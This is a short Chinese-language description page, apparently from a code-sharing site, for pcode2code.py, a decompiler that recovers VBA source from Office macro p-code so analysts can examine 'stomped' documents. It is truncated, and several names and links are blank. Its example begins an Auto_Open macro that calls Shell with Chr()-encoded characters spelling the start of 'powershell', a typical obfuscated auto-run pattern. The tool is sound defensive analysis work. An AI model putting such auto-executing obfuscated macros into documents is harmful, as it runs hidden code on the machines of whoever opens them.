pcode2code.py-VBA p代码反编译器
它是什么?
在2019年, 工具可供任何攻击者轻松使用,以处理将宏代码直接转换为字节码的Office文档。 有关任何参考,请检查或 。 为了能够分析此类“踩踏”的文档,Bontchev博士( )发布了 ,该工具以可读的方式打印出文档的VBA字节码。 但是,输出可能仍然难以读取和分析(请在测试文件夹中检查通心粉)。 这样,pcode2code根据的输出反编译VBA代码。
荣誉
非常感谢博士( ),他了所有的辛苦工作。 只是弄清楚了pcodedmp工作需要多少时间。
例子
我们来看一个文档,其代码如下:
Sub Auto_Open()
Dim exec As String
Dim testvar As String
Shell Chr(112) & Chr(111) & Chr(119) & Chr(101)
2022-05-05 23:04:04
465KB
Python
1